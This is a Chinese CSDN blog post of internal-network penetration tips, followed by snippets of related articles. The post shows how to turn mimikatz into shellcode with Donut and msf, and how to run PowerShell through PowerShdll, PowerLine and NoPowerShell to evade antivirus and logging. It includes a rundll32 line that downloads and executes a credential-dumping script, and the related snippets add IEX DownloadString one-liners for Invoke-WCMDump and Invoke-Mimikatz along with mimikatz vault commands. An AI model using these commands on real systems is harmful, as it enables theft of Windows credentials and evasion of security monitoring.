内网一些渗透技巧

最新推荐文章于 2022-11-17 02:37:27 发布
最新推荐文章于 2022-11-17 02:37:27 发布
阅读量418 收藏
点赞数
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43271194/article/details/110393788
版权

渗透技巧

msf+Donut交互式执行程序

简介

工具 Dount

Donut从VBScript,JScript,EXE,DLL(包括.NET程序集)文件生成x86或x64 Shellcode。 可以将此Shellcode注入到任意Windows进程中以在内存中执行。

使用方法

  1. 先msf生成一个后门程序,执行

  2. 然后执行

    /donut /usr/share/mimikatz/bypass360/mimikatz/sign-katz-x64.exe -a 2 -0 /tmp/payload.bin

    -a:是指定位数,2位64位
    -o:是指定输出

    得到一个

    2.png

  3. 用msf执行模块

得到一个交互式mimikatz

5.png

无powershell运行powershell方法

PowerLine
简介

是一款由c#编写的工具,支持本地命令行调用和远程调用,可以在不直接调用PowerShell的情况下调用PowerShell脚本,优点如下:

  • 自动识别win7、win10系统
  • 使用方便,无需复杂的ide
  • 自动xor编码

下载地址

使用

  • 首先拉取项目到本地,然后运行build.bat文件

    在这里插入图片描述

  • 然后在UserConf.xml文件中填写你所需要调用的powershell脚本的地址,默认自带powerup、powerview、Mimikatz等,只要按照他给定的格式加入你的ps脚本地址即可

  • 加入完成以后,运行PLBuilder.exe进行构建

PowerShdll
简介

主要使用dll去运行powershell而不需要去连接powershell.exe,所以具有一定的bypassAV能力,当然它也可以在这几个程序下运行rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe, regsvr32.exe或者使用作者给出的单独的exe进行执行

使用
  • 使用PowerShdll -i进入到交互模式,此时便获得了一个交互式的PS环境,可执行任意的powershell命令

在这里插入图片描述

  • dll版用法

    rundll32 PowerShdll.dll,main . { iwr -useb https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1 } ^| iex;

Nopowershell
简介

是用C#实现的工具,它支持执行类似PowerShell的命令,同时对任何PowerShell日志记录机制都不可见。同时也提供了CS下的cna脚本。

使用

.\NoPowerShell.exe

直接运行可得版本和帮助命令

SyncAppvPublishingServer
简介
使用

msbuild

microsoft.com

Amire0x
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Invoke-WCMDump结合powershell进行密码获取
03-26
Ivoke-WCMDump 什么是Credential Manager Credential Manager,中文翻译为凭据管理器,用来存储凭据(例如网站登录和主机远程连接的用户名密码),如果用户选择存储凭据,那么当用户再次使用对应的操作,系统会自动填入凭据,实现自动登录,凭据保存在特定的位置,被称作为保管库(vault)(位于%localappdata%/Microsoft\Vault) 从Credential Manager导出Windows凭据的Powershell脚本 https://github.com/peewpw/Invoke-WCMDump PS>Import-Module .\Invoke-WCMDump.ps1 PS>Invoke-WCMDump powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump"
查看windows电脑凭证密码 -Invoke-WCMDump
caperxi的博客
06-10 2647
Invoke-WCMDump 用于从凭据管理器转储 Windows 凭据的 PowerShell 脚本 Invoke-WCMDump 在凭据管理器中枚举 Windows 凭据,然后提取有关每个凭据的可用信息。为“通用”类型凭证检索密码,但不能通过相同方法为“域”类型凭证检索密码。仅为当前用户返回凭据。 资源下载:Invoke-WCMDump PS>Import-Module .\Invoke-WCMDump.ps1 PS>Invoke-WCMDump Username :
内网渗透内网主机信息收集
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-17 1337
在我们成功进入了内网渗透的阶段后,拿到了主机的管理员权限,接下来就是要收集内网中主机的各种信息,以便于我们进行后续的横向移动等扩大我们战果的操作。
Java的.NET平台调用范例(J / Invoke
04-11
描述了一个SDK,该SDK支持直接Java调用以从常规DLL模块导出函数
内网渗透技巧
05-31
内网渗透技巧思路篇,懂得安全的小伙伴可以下载看看。
agent内网渗透代理相关
最新发布
04-14
内网渗透代理
fscan内网渗透神器
09-21
scan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web...
内网渗透技术总结大全.pdf
12-22
内网渗透技术总结大全.pdf
内网渗透思路整理与工具使用
12-08
内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用
donut:生成x86,x64或AMD64 + x86位置无关的shellcode,该shellcode从内存中加载.NET程序集,PE文件和其他Windows有效负载,并使用参数运行它们
04-29
当前版本: 请提交有关v1.0版本的问题和要求 目录 用甜甜圈开发 问题与讨论 免责声明 1.简介 Donut是与位置无关的代码,可在内存中执行VBScript,JScript,EXE,DLL文件和dotNET程序集。 Donut创建的模块既可以从HTTP服务器进行登台,也可以直接嵌入到加载程序本身中。 可以选择使用Chaskey块密码和128位随机生成的密钥对模块进行加密。 文件加载并在内存中执行后,原始引用将被删除以阻止内存扫描程序。 生成器和加载器支持以下功能: 使用aPLib和LZNT1,Xpress,Xpress Huffman通过RtlCompressBuffer压缩输入文件。 将熵用于API哈希和字符串生成。 文件的128位对称加密。 修补反恶意软件扫描接口(AMSI)和Windows锁定策略(WLDP)。 修补EXE文件的命令行。 修补与出口相关的API,以避
本机内网信息搜集
sinat_38378265的博客
03-26 285
1.查看用户信息 Windows命令net user,Linux命令cat /etc/passwd 2.查看进程信息 Windows命令tasklist,可以taskkill /pid 进程号 /f关闭对应进程 Linux命令ps aux或者top,强制终止进程kill -9 进程号。 3.查看服务类别 Windows命令net start Linux命令chkconfig –list或者serv...
RDP登录凭据获取
tomyyyyy
08-27 829
RDP登录凭据获取 当用户在RDP登录时点击了保存登录凭据,获取凭据可以使用以下几种方法 #查看mstsc的连接记录 cmdkey /list #查找本地的Credentials dir /a %userprofile%\appdata\local\microsoft\credentials\* Mimikatz 存在的话,使用Mimikatz,执行以下命令,记录guidMasterKey值 ...
Invoke-Mimikatz.ps1获取系统密码
weixin_34357267的博客
06-07 951
(1)Invoke-Mimikatz.ps1下载地址https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1(2)具备网络环境直接执行命令powershell "IEX (New-Object Net.WebClient).DownloadString('...
获取windows凭证管理器明文密码
weixin_30897079的博客
04-26 1万+
1.运行cmdkey /list查看windows保存凭证 方法1.mimikaz mimikatz vault::cred 2.利用powershell尝试获取 windows 普通凭据类型中的明文密码 powershell-import F:\tools\powershell脚本\Invoke-WCMDump.ps1 powershell Invoke-WCMDd...
11--使用 mimikatz 提取 windows凭据的密码
热门推荐
SunShine
06-28 3万+
mimikatz一.mimikatz简介  是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。作者主页:http://...
【横向移动】内网渗透内网信息收集
weixin_45588247的博客
08-01 2014
首先要能拿下一台可连接内的机器权限(webshell),然后才能开始域渗透收集系统一般信息,包括操作系统、IP、是否存在杀毒软件、打过的补丁,用户信息,服务及任务信息,组网信息,计划任务信息,事件查看器信息和文件夹和文件位置信息。 对机器角色的判断。对目前机器所处网络环境的拓扑结构进行分析和判断。对目前机器所处位置区域的判断
powershell + Invoke-Mimikatz.ps1获取系统密码
大方子
10-29 5774
参照:https://blog.51cto.com/simeon/2126106 进行实现 Invoke-Mimikatz.ps1下载地址 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 (1)目标主机具备网络环境 power...
python内网渗透
10-24
Python内网渗透是指利用Python编写的工具和脚本,通过漏洞利用、端口扫描、密码爆破等方式,获取内网中的敏感信息或者控制内网主机的过程。常用的Python内网渗透工具有reGeorgSocksProxy、ABPTTS等。其中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值